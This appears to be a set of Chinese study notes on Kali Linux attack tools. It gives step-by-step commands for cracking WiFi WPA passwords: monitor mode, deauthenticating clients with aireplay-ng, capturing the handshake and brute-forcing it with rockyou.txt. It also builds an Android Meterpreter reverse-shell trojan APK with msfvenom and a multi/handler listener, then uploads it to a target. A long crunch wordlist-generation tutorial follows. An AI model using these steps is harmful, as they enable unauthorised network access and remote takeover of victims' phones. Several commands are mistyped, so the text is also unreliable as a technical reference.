一、虚拟机-可移动设备-Ralink(网上)-连接
二、lsusb查看确认,iwconfig,查看外围网卡(可能会显示wlan0)
(1)启动wifite
(2)出现热点列表
(3)ctrl+ c 停止,选择指定的热点序号
(4)以下就是自动化抓握手包(会在当前目录下/hs/下产生一个.cap包)
(5)/usr/share/wordlists/目录下有一个字典文件,rockyou.txt.gz,在kali里面以图形化界面(computer),解压出来(右键)。(班组时,提示使用该密码,个人时,不一定)。
(6)airdump -w 1.txt /root/hs/x.cap(注意路径)
字典文件另外可以通过工具直接生成,或者使用kali中自带的crunch。
https://www.cnblogs.com/student-programmer/p/6729101.html
1.airmon-ng start wlan0(启动为monitor模式)
再用iwconfig查看,wlan0会变成wlan0mon
2.airodump-ng wlan0mon
开始搜索所有热点
3.发现指定AP的SSID
4.另开一个窗口,用airodump-ng -c 1(指定AP所在信道CH)- - bssid wlan0mon
5.再另开一个窗口,用aireply-ng -0 5 -a 00:14…. –c 11:22….. wlan0mon
(-0:是数字0,不是字母o,-a:是AP的SSID,-c:是客户机的MAC)
6.发现5中的窗口右上角,出现shakehand (抓到握手包)
7. airdump -w 1.txt /root/hs/x.cap(注意路径)
8.暴出密码。
9.本机连接wifi。
一、msfvenom -p android/meterpreter/reverse_tcplhost=172.16.0.1 lport=4444 > 111.apk
上传到目标机。
二、
Msfconsole
set payloadandroid/meterpreter/reverse_http
useexploit/multi/handler
三、使用手机模拟工具
运用木马
https://blog.csdn.net/u011781521/article/details/69400198
-b #体积大小,比如后跟20mib
-c #密码个数(行数),比如8000
-d #限制出现相同元素的个数(至少出现元素个数),-d 3就不会出现zzf ffffgggg之类的
-e #定义停止生成密码,比如-e 222222:到222222停止生成密码
-f #调用密码库文件,比如/usr/share/crunch/charset.lst
-i #改变输出格式
-l #与-t搭配使用
-m #与-p搭配使用
-o #保存为
-p #定义密码元素(若指定,必须放在最后)
-q #读取字典
-r #定义从某一个地方重新开始
-s #第一个密码,从xxx开始
-t #定义输出格式
@代表小写字母
,代表大写字母
%代表数字
^代表符号
案例1:
crunch 1 8
#生成最小1位,最大8位,由26个小写字母为元素的所有组合
案例2:
crunch 1 6 abcdefg
#生成最小为1,最大为6.由abcdefg为元素的所有组合
案例3:
crunch 1 6 abcdefg\
#生成最小为1,最大为6.由abcdefg和空格为元素的所有组合(/代表空格)
案例4:
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
#调用密码库charset.lst,生成最小为1,最大为8,元素为密码库charset.lst中mixalpha-numeric-all-space的项目,并保存为wordlist.txt;其中charset.lst在kali_linux的目录为/usr/share/crunch/charset.lst,charset.lst中mixalpha-numeric-all-space项目包含最常见的元素组合(即大小写字母+数字+常见符号);
>想了解更多可以cat/usr/share/crunch/charset.lst 查看所有密码库
(如果要使用字符集的话,要指定路径)
案例5:
crunch 8 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt -t @@dog@@@ -s cbdogaaa
#调用密码库charset.lst,生成8位密码;其中元素为密码库charset.lst中mixalpha-numeric-all-space的项;格式为“两个小写字母+dog+三个小写字母”,并以cbdogaaa开始枚举(@代表小写字母)
案例6:
crunch 2 3 -f charset.lst ualpha -s BB
#调用密码库charset.lst,生成2位和3位密码;其中元素为密码库charset.lst中ualpha的项;并且以BB开头
案例7:
crunch 4 5 -p abc
#crunch将会生成abc,acb, bac, bca, cab, cba,虽然数字4和5这里没用,但必须有
案例8:
crunch 4 5 -p dog cat bird
#crunch将生成以“dog”“cat”“bird”为元素的所有密码组合:birdcatdog,birddogcat,catbirddog, catdogbird, dogbirdcat, dogcatbird
案例10:
crunch 4 5 -b 20mib -o START
# 生成最小为4位,最大为5位元素为所有小写字母的密码字典,并以20M进行分割;这时会生成4个文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三个大概每个20M,最后一个10M左右(因为总共70M)
案例11:
crunch 4 4 + + 123 +-t %%@^(+是占位符,有顺序,分别为小写字母、大写字母、数字、特殊符号,123所在的位置是数字,但是限定为123,其它类似。)(输出的话,-o 1.txt)
#生成4位密码,其中格式为“两个数字”+“一个小写字母”+“常见符号”(其中数字这里被指定只能为123组成的所有2位数字组合)。比如12f# 32j^ 13t$ ......
案例12:
crunch 3 3 abc + 123 @#! -t @%^
#生成3位密码,其中第一位由“a,b,c”中的一个;第二位为“1,2,3”中的一个;第三位为“!,@,#”中的一个。比如1a! 2a# 3b@ ......
案例13:
crunch 3 3 abc + 123 @#! -t ^%@
#生成3位密码,其中格式为“字符+数字+字母”,这里字符范围为!@# ,数字范围为 1 2 3, 字母范围为a b c
比如!1c @3b @2a ......
案例14
crunch 5 5 -t ddd@@ -p dog cat bird
#生成5个元素组成的密码,其中前三个为dog cat bird任意组合,后两个为两个小写字母的任意组合。比如birddogcatuz catdogbirdab birdcatdogff ......
案例15:
crunch 7 7 -t p@ss,%^ -l a@aaaaa
#生成7位密码,格式为“字符p@ss”+大写字母+数字+符号 比如 p@ssZ9> ......
案例16:
crunch 5 5 -s @4#S2 -t @%^,% -e @8 Q2 -l @dddd -b 10KB -o START
#生成5位密码,格式为小写字母+数字+符号+大写字母+数字,并以 @4#S2开始,分割为10k大小。。。
案例17:
crunch 5 5 -d 2@ -t @@@%%
#生成5位密码,格式为三个字母+两个数字,并限制每个密码最少出现2种字母
案例18:
crunch 10 10 -t @@@^%%%%^^ -d 2@ -d 3% -b 20mb -o START
#生成10位密码,格式为三个小写字母+一个符号+四个数字+两个符号,限制每个密码至少2种字母和至少3种数字
案例19:
crunch 8 8 -d 2@
#生成8位密码,每个密码至少出现两种字母
案例20:
crunch 4 4 -f unicode_test.lst the-greeks -t @@%% -l @xdd
#调用密码库unicode_test.lst中的the-greeks项目字符,生成4位密码,其中格式为两小写字母+两数字,同样kali_linux中unicode_test.lst 在/usr/share/crunch目录
案例9:
crunch 1 5 -o START -c 6000 -z bzip2
# 生成最小为1位,最大为5位元素为所有小写字母的密码字典,其中每一个字典文件包含6000个密码,并将密码文件保存为bz2文件,文件名将以 "第一个密码"+ " - " + "最后一个密码"+ " .txt.bz2 " 保存(比如000-999.txt.bz2);下面是生成几种格式的压缩文件所用的时间和体积大小对比:
# time ./crunch 1 4 -o START -c 6000 -z gzip
real 0m2.729s
user 0m2.216s
sys 0m0.360s
# time ./crunch 1 4 -o START -c 6000 -z bzip2
real 0m3.414s
user 0m2.620s
sys 0m0.580s
# time ./crunch 1 4 -o START -c 6000 -z lzma
real 0m43.060s
user 0m9.965s
sys 0m32.634s
size filename
30K aaaa-aiwt.txt
12K aaaa-aiwt.txt.gz
3.8K aaaa-aiwt.txt.bz2
1.1K aaaa-aiwt.txt.lzma